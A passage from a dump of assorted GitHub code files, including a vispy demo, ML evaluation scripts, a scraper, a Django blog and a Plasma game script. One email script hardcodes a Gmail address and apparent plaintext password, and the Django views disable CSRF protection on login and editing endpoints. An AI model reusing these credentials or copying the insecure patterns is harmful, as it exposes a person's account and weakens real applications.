np.zeros((4+4+514+514, 2), np.float32)\n\n x_baseline = P[:4]\n y_baseline = P[4:8]\n x_profile = P[8:522]\n y_profile = P[522:]\n\n x_baseline[...] = (-1, yf), (-1, yf), (1, yf), (1, yf)\n y_baseline[...] = (xf, -1), (xf, -1), (xf, 1), (xf, 1)\n\n x_profile[1:-1, 0] = np.linspace(-1, 1, 512)\n x_profile[1:-1, 1] = yf + 0.15 * idxs[y_norm, :]\n x_profile[0] = x_profile[1]\n x_profile[-1] = x_profile[-2]\n\n y_profile[1:-1, 0] = xf + 0.15 * idxs[:, x_norm]\n y_profile[1:-1, 1] = np.linspace(-1, 1, 512)\n y_profile[0] = y_profile[1]\n y_profile[-1] = y_profile[-2]\n\n self.lines[\"position\"] = P\n self.update()\n\nif __name__ == '__main__':\n canvas = Canvas()\n app.run()\n","repo_name":"vispy/vispy","sub_path":"examples/demo/gloo/imshow_cuts.py","file_name":"imshow_cuts.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"en","doc_type":"code","stars":3147,"dataset":"github-code","pt":"30"} +{"seq_id":"12187535230","text":"from argparse import ArgumentParser\nimport numpy as np\nimport torch\nfrom utils import save_results\nimport mnist\nimport mnist_cifar10\nfrom mnist.dataloaders import mnist_combined_test_loader\nfrom mnist_cifar10.dataloaders import (\n dual_channel_cifar10_test_loader,\n dual_channel_mnist_test_loader,\n)\nfrom archs.lenet5 import LeNet5, LeNet5Halfed\nfrom archs.resnet import ResNet18\nfrom archs.pan import PAN, AgnosticPAN\nfrom config import SEEDS\n\n\ndef main(args):\n # Initialize arguments based on dataset chosen\n if args.dataset == \"disjoint_mnist\":\n test_loader = mnist_combined_test_loader(args.test_batch_size)\n args.d1 = \"first5_mnist\"\n args.d2 = \"last5_mnist\"\n args.m1_input_channel = 1\n args.m2_input_channel = 1\n args.output_size = 5\n m = mnist\n elif args.dataset == \"mnist_cifar10\":\n test_loader = [\n dual_channel_mnist_test_loader(args.test_batch_size),\n dual_channel_cifar10_test_loader(args.test_batch_size),\n ]\n args.d1 = \"mnist\"\n args.d2 = \"cifar10\"\n args.m1_input_channel = 1\n args.m2_input_channel = 3\n args.output_size = 10\n m = mnist_cifar10\n\n # Initialize models based on architecture chosen\n if args.arch == \"lenet5\":\n arch = LeNet5\n args.feature_size = 120\n elif args.arch == \"lenet5_halfed\":\n arch = LeNet5Halfed\n args.feature_size = 60\n elif args.arch == \"resnet18\":\n arch = ResNet18\n args.feature_size = 512\n\n # Initialize logits statistics function\n if args.experiment == \"logits_statistics\":\n experiment = m.logits_statistics\n elif args.experiment == \"multi_pass_aug_mean\":\n experiment = m.multi_pass_aug_mean\n elif args.experiment == \"multi_pass_aug_voting\":\n experiment = m.multi_pass_aug_voting\n elif args.experiment == \"smart_coord\":\n experiment = m.smart_coordinator\n\n # Pan settings\n if args.pan_type == \"feature\":\n pan_input_size = args.feature_size\n pan_arch = PAN\n elif args.pan_type == \"logits\":\n pan_input_size = args.output_size\n pan_arch = PAN\n elif args.pan_type == \"agnostic_feature\":\n pan_input_size = 3\n pan_arch = AgnosticPAN\n elif args.pan_type == \"agnostic_logits\":\n pan_input_size = 3\n pan_arch = AgnosticPAN\n\n # Running the test\n print(f\"Dataset: {args.dataset}\")\n print(f\"Model: {args.arch}\")\n results = []\n\n for i in range(len(args.seeds)):\n seed = args.seeds[i]\n np.random.seed(seed)\n torch.manual_seed(seed)\n print(f\"\\nIteration: {i+1}, Seed: {seed}\")\n\n # Load models\n model1 = arch(\n input_channel=args.m1_input_channel, output_size=args.output_size\n ).to(args.device)\n model1.load_state_dict(\n torch.load(\n args.output_dir + f\"{args.d1}_{args.arch}_{args.seeds[i]}\",\n map_location=torch.device(\"cpu\"),\n )\n )\n model2 = arch(\n input_channel=args.m2_input_channel, output_size=args.output_size\n ).to(args.device)\n model2.load_state_dict(\n torch.load(\n args.output_dir + f\"{args.d2}_{args.arch}_{args.seeds[i]}\",\n map_location=torch.device(\"cpu\"),\n )\n )\n\n # Running the experiment\n if args.experiment == \"smart_coord\":\n pan1 = pan_arch(input_size=pan_input_size).to(args.device)\n pan1.load_state_dict(\n torch.load(\n args.pan_dir\n + f\"pan_{args.pan_type}_{args.dataset}({args.d1})_{args.arch}_{args.seeds[i]}\",\n map_location=torch.device(\"cpu\"),\n )\n )\n pan2 = pan_arch(input_size=pan_input_size).to(args.device)\n pan2.load_state_dict(\n torch.load(\n args.pan_dir\n + f\"pan_{args.pan_type}_{args.dataset}({args.d2})_{args.arch}_{args.seeds[i]}\",\n map_location=torch.device(\"cpu\"),\n )\n )\n result = experiment(args, model1, model2, pan1, pan2, device, test_loader)\n else:\n result = experiment(args, model1, model2, device, test_loader)\n\n # Adding more info to the result to be saved\n for r in result:\n r.update({\"iteration\": i, \"seed\": args.seeds[i]})\n results.extend(result)\n\n # Save the results\n if args.save_results and args.experiment == \"smart_coord\":\n save_results(\n f\"{args.dataset}_{args.arch}_{args.pan_type}\",\n results,\n f\"{args.results_dir}{args.experiment}/\",\n )\n elif args.save_results:\n save_results(\n f\"{args.dataset}_{args.arch}\",\n results,\n f\"{args.results_dir}{args.experiment}/\",\n )\n \n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\n \"--dataset\",\n type=str,\n default=\"disjoint_mnist\",\n choices=[\"disjoint_mnist\", \"mnist_cifar10\"],\n )\n parser.add_argument(\n \"--arch\",\n type=str,\n default=\"lenet5\",\n choices=[\"lenet5\", \"lenet5_halfed\", \"resnet18\"],\n )\n parser.add_argument(\n \"--experiment\",\n type=str,\n default=\"logits_statistics\",\n choices=[\n \"logits_statistics\",\n \"multi_pass_aug_mean\",\n \"multi_pass_aug_voting\",\n \"smart_coord\",\n ],\n )\n parser.add_argument(\n \"--pan_type\",\n type=str,\n default=\"feature\",\n choices=[\"feature\", \"logits\", \"agnostic_feature\", \"agnostic_logits\"],\n )\n parser.add_argument(\"--test_batch_size\", type=int, default=1000)\n parser.add_argument(\"--epochs\", type=int, default=10)\n parser.add_argument(\"--lr\", type=float, default=0.01, help=\"learning rate\")\n parser.add_argument(\"--momentum\", type=float, default=0.9)\n parser.add_argument(\"--no_cuda\", type=bool, default=False)\n parser.add_argument(\"--log_interval\", type=int, default=10)\n parser.add_argument(\"--save_results\", type=bool, default=True)\n parser.add_argument(\"--results_dir\", type=str, default=\"./results/merge/\")\n parser.add_argument(\"--output_dir\", type=str, default=\"./cache/models/\")\n parser.add_argument(\"--pan_dir\", type=str, default=\"./cache/models/pan/\")\n\n args = parser.parse_args()\n\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n args.seeds = SEEDS\n args.device = device\n main(args)\n","repo_name":"cwkang1998/network-merging","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":6634,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"30"} +{"seq_id":"1317156467","text":"###### WEB SCRAPER\n#######################\n\n##### Imports\nfrom bs4 import BeautifulSoup as bs\nimport csv\n\n##### Variables\nheaders = [\"Name\", \"Term\", \"GPA\", \"Approval\", \"Program\", \"Major\", \"Support\" ]\nnames = []\nterms = []\ngpas = []\napproval = []\nprogram = []\nmoney = []\nmajors = []\n\n##### Functions\ndef get_span(lst):\n for ele in lst:\n try:\n content = ele.find('span')\n return content.contents\n except:\n continue\n return \"\"\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\ndef deList(lst):\n final = \"\"\n for i in lst:\n final += i\n return final\n\ndef write(_row):\n with open(\"StudyAbroadSF18.csv\", \"a\") as f:\n writer = csv.writer(f, quoting = csv.QUOTE_NONNUMERIC)\n writer.writerow(_row)\n\n##### Code\nwith open(\"html.txt\", \"r\") as txtFile:\n htmlData = txtFile.read()\n soup = bs(htmlData, 'html.parser')\n tableHtml = soup.find_all('table',class_=\"table-bordered table-condensed data-table\")\n rowHtml = soup.find_all('td', class_=\"LightSolidBorder\", valign=\"top\")\n\n for personData in tableHtml:\n personRows = personData.find_all(\"tr\")\n for row in personRows:\n spans = row.find_all('span')\n\n # the first span (ie spans[0]) gives content Id\n #\n # only want:\n # 1) 1-1, Advisor Approval\n # 2) 2-1, Study Abroad Program\n # 3) 2-6, Financial Need\n # 4) 2-9, Major Field of Study\n try:\n if spans[0].string.strip() == \"1-1\":\n try:\n approval.append(spans[1].string.strip())\n except:\n approval.append(\"check approval\")\n\n if spans[0].string.strip() == \"2-1\":\n try:\n program.append(spans[1].string.strip())\n except:\n print(\"no program\")\n\n if spans[0].string.strip() == \"2-6\":\n\n try:\n financialInfo = ''\n\n for e in spans[1].findAll('br'):\n e.replace_with(' ')\n\n for e in spans[1].findAll('strong'):\n e.replace_with(' ')\n\n for i in spans[1].contents:\n financialInfo += i.strip() + \" \"\n\n money.append(financialInfo)\n\n except:\n money.append(\"check attachment\")\n\n if spans[0].string.strip() == \"2-9\":\n try:\n majors.append(spans[1].string.strip())\n except:\n print(\"no major\")\n\n except:\n continue\n\n\n ## Get Names, GPAS and terms\n count=1\n for ele in rowHtml:\n\n info = ele.contents\n\n if (count%3 == 1):\n for i in info:\n\n try:\n i = i.contents[0].replace(u'\\xa0', u'')\n i = i.replace(u'\\n', u'')\n i = i.replace(u'\\t', u'')\n names.append(i)\n except:\n continue\n\n elif (count%3 == 2):\n for i in info:\n i = i.contents[0]\n if \"Academic\" in i:\n continue\n terms.append(i)\n\n else:\n for i in info:\n i = i.string.replace(u'\\xa0', u'')\n i = i.replace(u'\\n', u'')\n i = i.replace(u'\\t', u'')\n if (i == ''):\n continue\n gpas.append(i)\n\n count += 1\n\n# Due to html format, we lost a approval, GPA and Term observation\n# Add missing entry manually\nterms.insert(21,\"Summer\")\ngpas.insert(21,\"0\")\napproval.append(\"YES\")\n\n# Already checked lists are all same length\n# Write CSV File\nwrite(headers)\nfor i in range(len(names)):\n rowData = [names[i],terms[i], gpas[i], approval[i], program[i], majors[i], money[i]]\n write(rowData)\n","repo_name":"carmenastorne/HtmlParser","sub_path":"Scrape.py","file_name":"Scrape.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"27979885010","text":"import smtplib\nconnection=smtplib.SMTP(\"smtp.gmail.com\",587)\nconnection.starttls()\nconnection.login(\"vaishnavi.p6521@gmail.com\",\"Priy@6521\")\nmessage=\"Hello , I am Vaishnavi\"\nconnection.sendmail(\"vaishnavi.p6521@gmail.com\", \"priya.hajela358@gmail.com\", message)\ndata=input(\"Enter a string:\")\nx=slice(5)\nprint(data)\nprint(data[x])\nprint(\"Email sent successfully\")\nconnection.quit()","repo_name":"KalaiarasiPattusamy/July24-code-assessment","sub_path":"JULY24/24july-Vaishnavi-code assesment/Stringmail.py","file_name":"Stringmail.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"30"} +{"seq_id":"10973019067","text":"'''Create a class Student and then do the following\nCreate a data member to count number of students\nCreate a constructor to initialize name and other personal details\nCreate a function to calculate number of students\nCreate a function to display students name ,rollno and grades\nCreate a TransferStudent class and it should inherit the properties of Student class.\nCreate instances of TransferStudent and Student class and call their member functions.\n\n def checkCode(self, value):\n return self.pin == value\n '''\nclass student:\n no_of_student = 0\n\n def __init__(self, name,rollno,grades):\n self.name = name\n self.rollno=rollno\n self.grades=grades\n\n\n def count(self):\n self.__class__.no_of_student +=1\n\n\n def details(self):\n return \"%s is student and rollno %s and has grades %s \"% (self.name, self.rollno, self.grades)\n#Create a TransferStudent class and it should inherit the properties of Student class.\nclass TransferStudent(student):\n def __init__(self,name,rollno,grades):\n student.__init__(self,name,rollno,grades)\n\n\n#Create instances of TransferStudent and Student class and call their member functions.\nAli = student(\"Ali\",23321,\"B\")\nAli.count()\nHasan = TransferStudent(\"Hasan\",3232121,\"C\")\nHasan.count()\n\nprint(Ali.details())\nprint(\"Number of students are\",Ali.__class__.no_of_student)\nprint(Hasan.details())\nprint(\"Number of students are\",Hasan.__class__.no_of_student)\n\n\n","repo_name":"liaquat85/Python-Machine-Learning-UMKC","sub_path":"Lesson 4/ICE4/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"39091403381","text":"class Node:\n def __init__(self,dataval):\n self.dataval=dataval\n self.nextval=None\nclass Linkedlist:\n def __init__(self):\n self.headval=None\n def printlist(self):\n printval=self.headval\n while printval!=None:\n print(printval.dataval)\n printval=printval.nextval\n\n def scarch(self,k):\n p=self.headval\n if p!=None:\n while p.nextval!=None:\n if p.dataval==k:\n return True\n p=p.nextval\n if p.dataval==k:\n return True\n return False\n\nlist=Linkedlist()\nlist.headval=Node(\"sat\")\ne1=Node(\"Sun\")\ne2=Node(\"Mon\")\nlist.headval.nextval=e1\ne1.nextval=e2\nlist.printlist()\nprint(\"Given node is\",list.scarch(\"sat\"))\n","repo_name":"naim04/Practice-Algorithm","sub_path":"Scarching Unsorted linkedlist.py","file_name":"Scarching Unsorted linkedlist.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"5298052582","text":"from Plasma import *\nfrom PlasmaTypes import *\nfrom PlasmaConstants import *\nfrom PlasmaKITypes import *\nfrom xStartPathHelpers import *\n\n\n#rgnSnsrFissureDrop = ptAttribActivator(1, \"rgn snsr: fissure drop spawn\")\nrespFissureDropStart = ptAttribResponder(1,\"resp: fissure drop start\")\nrespFissureDropMain = ptAttribResponder(2,\"resp: fissure drop main\")\n\nloadTomahna = 0\nloadZandi = 0\nloadBook = 0\nfissureDrop = 0\n\nkIntroPlayedChronicle = \"IntroPlayed\"\n\n\nclass Cleft(ptResponder):\n\n def __init__(self):\n ptResponder.__init__(self)\n self.id = 5209\n self.version = 22\n\n #var used to load in Cleft/Tomahna specific stuff based on chronicle vals\n global loadTomahna\n global loadZandi\n global loadBook\n \n loadTomahna = 0\n loadZandi = 0\n loadBook = 0\n\n #checks chronicle entries, if don't exist or is set to no,\n #then decides if Tomahna or Zandi should be paged in\n\n if not IsCleftSolved():\n loadZandi = 1\n loadBook = 1\n\n vault = ptVault()\n entryTomahna = vault.findChronicleEntry(\"TomahnaLoad\")\n if entryTomahna is not None:\n entryTomahnaValue = entryTomahna.getValue()\n if entryTomahnaValue == \"yes\":\n loadTomahna = 1\n if loadZandi:\n loadZandi = 0\n if loadBook:\n loadBook = 0\n\n pages = []\n\n # Add the age specific pages\n if loadTomahna:\n pages += [\"Cleft\",\"tmnaDesert\",\"MaleShortIdle\",\"FemaleShortIdle\",\"YeeshaFinalEncounter\",\"FemaleTurnRight180\",\"MaleTurnRight180\",\"clftSndLogTracks\",\"clftAtrusGoggles\"]\n else:\n pages += [\"Desert\",\"Cleft\",\"FemaleCleftDropIn\",\"MaleCleftDropIn\",\"clftJCsDesert\",\"clftJCsChasm\"]\n if loadZandi:\n pages += [\"clftZandiVis\",\"ZandiCrossLegs\",\"ZandiDirections\",\"ZandiDirections01\",\"ZandiDirections02\",\"ZandiDirections03\"]\n pages += [\"ZandiIdle\",\"ZandiRubNose\",\"ZandiScratchHead\",\"ZandiTurnPage\",\"ZandiAllFace\",\"ZandiOpen01Face\"]\n pages += [\"ZandiOpen02Face\",\"ZandiRand01Face\",\"ZandiRand02Face\",\"ZandiRand03Face\",\"ZandiRand04Face\",\"ZandiRand05Face\"]\n pages += [\"ZandiRes01aFace\",\"ZandiRes01bFace\",\"ZandiRes02aFace\",\"ZandiRes02bFace\",\"ZandiRes03aFace\",\"ZandiRes03bFace\"]\n pages += [\"ZandiJC01aFace\",\"ZandiJC01bFace\",\"ZandiJC02aFace\",\"ZandiJC02bFace\",\"ZandiJC03aFace\",\"ZandiJC03bFace\"]\n pages += [\"ZandiJC04aFace\",\"ZandiJC04bFace\",\"ZandiJC05aFace\",\"ZandiJC05bFace\",\"ZandiJC06aFace\",\"ZandiJC06bFace\"]\n pages += [\"ZandiJC07aFace\",\"ZandiJC07bFace\"]\n else:\n PtDebugPrint(\"Zandi seems to have stepped away from the Airstream. Hmmm...\")\n if loadBook:\n pages += [\"clftYeeshaBookVis\",\"FemaleGetPersonalBook\",\"MaleGetPersonalBook\"]\n else:\n PtDebugPrint(\"Zandi seems to have stepped away from the Airstream. Hmmm...\")\n\n # Put in all the common pages\n pages += [\"BookRoom\",\"clftAtrusNote\"]\n pages += [\"FemaleClimbOffTreeLadder\",\"FemaleGetOnTreeLadder\",\"FemaleWindmillLockedCCW\",\"FemaleWindmillLockedCW\",\"FemaleWindmillStart\"]\n pages += [\"MaleClimbOffTreeLadder\",\"MaleGetOnTreeLadder\",\"MaleWindmillLockedCCW\",\"MaleWindmillLockedCW\",\"MaleWindmillStart\"]\n pages += [\"YeeshaVisionBlocked\",\"YeeshaFinalVision\"]\n\n PtPageInNode(pages)\n\n if loadTomahna:\n #now that Tomahna pages have loaded, reset its chronicle value back to no,\n #so subsequent linking will default to regular Cleft instead of Tomahna,\n #unless a Tomahna link is used, of course...\n entryTomahna.setValue(\"no\")\n entryTomahna.save()\n\n pass\n\n\n def OnFirstUpdate(self):\n pass\n # test for first time to play the intro movie\n vault = ptVault()\n entry = vault.findChronicleEntry(kIntroPlayedChronicle)\n if entry is not None:\n # already played intro sometime in the past... just let 'em play\n PtSendKIMessage(kEnableKIandBB,0)\n else:\n # make sure the KI and blackbar is still diabled\n PtSendKIMessage(kDisableKIandBB,0)\n # It's the first time... start the intro movie, just by loading the movie dialog\n PtLoadDialog(\"IntroMovieGUI\")\n\n def OnServerInitComplete(self):\n global loadTomahna\n global fissureDrop\n \n ageSDL = PtGetAgeSDL()\n if StartInCleft():\n ageSDL[\"clftYeeshaBookVis\"] = (1,)\n PtSendKIMessageInt(kUpgradeKILevel, kMicroKI)\n PtSendKIMessage(kDisableEntireYeeshaBook,0)\n PtFindSceneobject(\"microBlackBarBody\", \"GUI\").draw.disable()\n PtGetLocalAvatar().avatar.setDontPanicLink(True)\n else:\n ageSDL[\"clftYeeshaBookVis\"] = (0,)\n\n # sets Tomahna SDL based on what is being loaded (thanks to chronicle val)\n # also settings previously contained in .fni files\n if loadTomahna:\n SDLVarName = \"clftTomahnaActive\"\n ageSDL[SDLVarName] = (1,)\n PtDebugPrint(\"Cleft.OnServerInitComplete: loadTomahna is 1, setting clftTomahnaActive SDL to 1\")\n #PtFogSetDefLinear(start, end, density)\n PtFogSetDefLinear(0,0,0)\n PtSetClearColor(.4,.4,.5)\n\n SDLVarSceneBahro = \"clftSceneBahroUnseen\"\n boolSceneBahro = ageSDL[SDLVarSceneBahro][0]\n if boolSceneBahro:\n PtDebugPrint(\"Cleft.OnServerInitComplete: SDL says bahro hasn't played yet, paging in SceneBahro stuff...\")\n PtPageInNode(\"clftSceneBahro\")\n else:\n PtDebugPrint(\"Cleft.OnServerInitComplete: SDL says SceneBahro already played, will NOT page in\")\n \n ageSDL.setNotify(self.key,SDLVarSceneBahro,0.0)\n \n SDLVarSceneYeesha = \"clftSceneYeeshaUnseen\"\n boolSceneYeesha = ageSDL[SDLVarSceneYeesha][0]\n if boolSceneYeesha:\n #PtDebugPrint(\"Cleft.OnServerInitComplete: SDL says Yeesha hasn't played yet, paging in SceneYeesha stuff...\")\n #PtPageInNode(\"clftSceneYeesha\")\n SDLVarOfficeDoor = \"clftOfficeDoorClosed\"\n boolOfficeDoor = ageSDL[SDLVarOfficeDoor][0]\n if boolOfficeDoor:\n PtDebugPrint(\"Cleft.OnServerInitComplete: SDL says Yeesha will play and office door is shut, will open it\")\n ageSDL[SDLVarOfficeDoor] = (0,)\n else:\n PtDebugPrint(\"Cleft.OnServerInitComplete: SDL says SceneYeesha already played, will NOT page in\")\n\n else:\n SDLVarName = \"clftTomahnaActive\"\n ageSDL[SDLVarName] = (0,)\n PtDebugPrint(\"Cleft.OnServerInitComplete: loadTomahna is 0, setting clftTomahnaActive SDL set to 0\")\n PtFogSetDefLinear(0,0,0)\n PtSetClearColor(0,0,0)\n \n linkmgr = ptNetLinkingMgr()\n link = linkmgr.getCurrAgeLink()\n spawnPoint = link.getSpawnPoint()\n\n spTitle = spawnPoint.getTitle()\n spName = spawnPoint.getName()\n \n if spName == \"LinkInPointFissureDrop\":\n fissureDrop = 1\n #avatar.physics.suppress(False)\n avatar = 0\n try:\n avatar = PtGetLocalAvatar()\n except:\n PtDebugPrint(\"failed to get local avatar\")\n return\n avatar.avatar.registerForBehaviorNotify(self.key)\n cam = ptCamera()\n cam.disableFirstPersonOverride()\n cam.undoFirstPerson()\n PtDisableMovementKeys()\n PtSendKIMessage(kDisableEntireYeeshaBook,0)\n respFissureDropStart.run(self.key,avatar=PtGetLocalAvatar())\n\n\n def Load(self): \n \n ageSDL = PtGetAgeSDL()\n\n # If both Kitchen and Office Doors are closed when linking into the age, this will open the Kitchen door.\n # It prevents Player from being locked out of Kitchen/Office if both doors were left shut when Player was last there...\n \n SDLVarKitchenDoor = \"clftKitchenDoorClosed\"\n SDLVarOfficeDoor = \"clftOfficeDoorClosed\"\n \n boolKitchenDoor = ageSDL[SDLVarKitchenDoor][0]\n boolOfficeDoor = ageSDL[SDLVarOfficeDoor][0]\n \n if boolKitchenDoor and boolOfficeDoor:\n PtDebugPrint(\"Cleft.OnLoad: both Kitchen and Office doors are closed... setting Kitchen door SDL to open\")\n ageSDL[SDLVarKitchenDoor] = (0,)\n else:\n PtDebugPrint(\"Cleft.OnLoad: either Kitchen and/or Office door is already open... leaving Kitchen door alone\")\n\n pass\n\n\n def OnNotify(self,state,id,events):\n global fissureDrop\n\n if (id == respFissureDropMain.id):\n PtDebugPrint(\"FISSUREDROP.OnNotify: respFissureDropMain.id callback\")\n if fissureDrop:\n cam = ptCamera()\n cam.enableFirstPersonOverride()\n fissureDrop = 0\n avatar = PtGetLocalAvatar()\n avatar.avatar.unRegisterForBehaviorNotify(self.key)\n PtEnableMovementKeys()\n PtSendKIMessage(kEnableEntireYeeshaBook,0)\n\n\n def OnBehaviorNotify(self,type,id,state):\n global fissureDrop\n \n #PtDebugPrint(\"Cleft.OnBehaviorNotify(): %d\" % (type))\n if type == PtBehaviorTypes.kBehaviorTypeLinkIn and not state:\n PtDebugPrint(\"FISSUREDROP.OnBehaviorNotify: fissureDrop = %d\" % (fissureDrop))\n if fissureDrop:\n PtDebugPrint(\"Cleft.OnBehaviorNotify(): will run respFissureDropMain now.\")\n respFissureDropMain.run(self.key,avatar=PtGetLocalAvatar())\n","repo_name":"H-uru/Plasma","sub_path":"Scripts/Python/Cleft.py","file_name":"Cleft.py","file_ext":"py","file_size_in_byte":9773,"program_lang":"python","lang":"en","doc_type":"code","stars":191,"dataset":"github-code","pt":"30"} +{"seq_id":"24381816262","text":"\n\nimport os\nfrom dotenv import load_dotenv\n\n\nload_dotenv()\n\n\nclass Config:\n def __init__(self) -> None:\n self.API_ID: str = os.environ.get(\"API_ID\", None)\n self.API_HASH: str = os.environ.get(\"API_HASH\", None)\n self.SESSION: str = os.environ.get(\"SESSION\", None)\n self.SUDOERS: list = [\n int(id) for id in os.environ.get(\"SUDOERS\", \" \").split() if id.isnumeric()\n ]\n if not self.SESSION or not self.API_ID or not self.API_HASH:\n print(\"Error: SESSION, API_ID and API_HASH is required!\")\n quit(0)\n self.QUALITY: str = os.environ.get(\"QUALITY\", \"high\").lower()\n self.PREFIXES: list = os.environ.get(\"PREFIX\", \"!\").split()\n self.LANGUAGE: str = os.environ.get(\"LANGUAGE\", \"en\").lower()\n\n\nconfig = Config()\n","repo_name":"ALBINPRAVEEN/MusicUserbot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"30"} +{"seq_id":"73243587924","text":"from django.core.checks import messages\nfrom django.shortcuts import render\nfrom my_blog.models import *\nfrom django.shortcuts import redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate, login\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\n# Create your views here.\n\n# home page of my_blog\n\n\ndef home(request):\n if request.method == 'GET':\n\n entry = Entry.objects.all().order_by('date_added')\n # top_rated = Entry.objects.annotate(\n # no_of_likes=Count('likes')).order_by('-no_of_likes')[:2]\n pages = Paginator(entry, 6)\n\n if request.GET.get('page'):\n print('executed')\n page_num = request.GET.get('page')\n page = pages.page(page_num)\n else:\n page = pages.page(1)\n\n entries = page.object_list\n\n print(len(entries))\n return render(request, 'base/base.html', {'entries': entries,\n 'pages': pages})\n\n\ndef get_article(request):\n if request.method == 'GET':\n filter_ = request.GET.get('id')\n article = Entry.objects.get(id=filter_)\n context = {\n 'entry': article}\n return render(request, 'my_blog/article.html', context)\n\n\n@csrf_exempt\ndef add_post(request):\n if request.user.is_authenticated:\n\n if request.method == 'GET':\n context = {\n 'choices': Category.objects.all(),\n }\n\n if request.method == 'POST':\n name = request.POST.get('article_name')\n topic_name = request.POST.get('topic_name')\n category = Category.objects.get(name=topic_name)\n detail = request.POST.get('text')\n picture = request.FILES.get('picture')\n\n topic = Topic(name=name,\n user=request.user, article_name=category)\n topic.save()\n entry = Entry.objects.create(\n user=request.user, topic=topic, text=detail, picture=picture)\n\n entry.save()\n return redirect('/')\n\n return render(request, 'my_blog/add_post.html', context)\n else:\n return redirect('/login')\n\n\n@csrf_exempt\ndef login_admin(request):\n # login form\n if request.method == 'POST':\n username = request.POST.get('username')\n pass_ = request.POST.get('password')\n user = authenticate(request, username=username, password=pass_)\n if user is not None:\n login(request, user)\n # user is authenticated\n return redirect('/')\n else:\n # add a message code here\n messages.add_message(request, messages.INFO, 'wrong credentials')\n return render(request, 'my_blog/login_form.html')\n\n\n@csrf_exempt\ndef update_post(request, topic_id):\n\n # getting topic text and updating\n if request.method == \"GET\":\n topic_ini = Topic.objects.get(id=topic_id)\n topic_text = Entry.objects.get(topic=topic_ini).text\n context = {\n 'topic': topic_ini,\n 'text': topic_text\n }\n return render(request, 'my_blog/add_page.html', context)\n\n else:\n topic_ini = Topic.objects.get(id=topic_id)\n new_entry = Entry.objects.get(topic__id=topic_id)\n topic_ini.article_name = request.POST['topic_name']\n topic_ini.save()\n new_entry.text = request.POST['text']\n new_entry.save()\n return redirect('/dashboard')\n\n\ndef get_categories(request):\n if request.method == 'GET':\n categories = Category.objects.all()\n context = {\n 'categories': categories,\n }\n return render(request, 'my_blog/display_categories.html', context)\n\n\ndef get_specifics(request):\n if request.method == 'GET':\n filter_ = request.GET.get('category')\n print(filter_)\n topics = Topic.objects.filter(\n article_name__name__iexact=filter_).order_by('-date_added')\n\n print(topics)\n context = {\n 'specifics': True,\n 'topics': topics\n }\n return render(request, 'learning_logs/display_categories.html', context)\n","repo_name":"atifasr/my_blog","sub_path":"my_blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"12187583650","text":"from argparse import ArgumentParser\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn.functional as F\nfrom torch import optim\nimport torchvision.utils as vutils\nfrom utils import create_op_dir\nfrom config import SEEDS\nfrom archs.lenet5 import LeNet5, LeNet5Halfed\nfrom archs.resnet import ResNet18\nfrom archs.gan import Generator\n\n\ndef train(args, gan, model, device, optimizer, epoch):\n model.eval()\n gan.train()\n for i in range(120):\n optimizer.zero_grad()\n z = torch.randn(args.batch_size, args.latent_dim)\n gen_imgs = gan(z)\n outputs_T, features_T = model(gen_imgs, out_feature=True)\n pred = outputs_T.data.max(1)[1]\n loss_activation = -features_T.abs().mean()\n loss_one_hot = F.cross_entropy(outputs_T, pred)\n softmax_o_T = F.softmax(outputs_T, dim=1).mean(dim=0)\n loss_information_entropy = (softmax_o_T * torch.log(softmax_o_T)).sum()\n loss = (\n loss_one_hot * args.oh\n + loss_information_entropy * args.ie\n + loss_activation * args.a\n )\n loss.backward()\n optimizer.step()\n if i == 1:\n print(\n \"[Epoch %d/%d] [loss_oh: %f] [loss_ie: %f] [loss_a: %f]\"\n % (\n epoch,\n args.epochs,\n loss_one_hot.item(),\n loss_information_entropy.item(),\n loss_activation.item(),\n )\n )\n\n\ndef generate_and_display(args, gan):\n def show_imgs(x, new_fig=True):\n grid = vutils.make_grid(x.detach().cpu(), nrow=8, normalize=True, pad_value=0.3)\n grid = grid.transpose(0, 2).transpose(0, 1) # channels as last dimension\n if new_fig:\n plt.figure()\n plt.imshow(grid.numpy())\n\n noise = torch.randn(64, args.latent_dim)\n imgs = gan(noise)\n show_imgs(imgs)\n\n\ndef train_model(gan, model, device, config_args):\n gan = gan.to(device)\n model = model.to(device)\n optimizer = optim.Adam(gan.parameters(), lr=config_args.lr, weight_decay=5e-4)\n for epoch in range(1, config_args.epochs + 1):\n train(\n config_args, gan, model, device, optimizer, epoch,\n )\n generate_and_display(args, gan)\n return gan\n\n\ndef train_gan(args):\n\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n # Initialize arguments based on dataset chosen\n if args.dataset == \"disjoint_mnist\":\n args.d1 = \"first5_mnist\"\n args.d2 = \"last5_mnist\"\n args.m1_input_channel = 1\n args.m2_input_channel = 1\n args.output_size = 5\n elif args.dataset == \"mnist_cifar10\":\n args.d1 = \"mnist\"\n args.d2 = \"cifar10\"\n args.m1_input_channel = 1\n args.m2_input_channel = 3\n args.output_size = 10\n\n # Initialize models based on architecture chosen\n if args.arch == \"lenet5\":\n arch = LeNet5\n elif args.arch 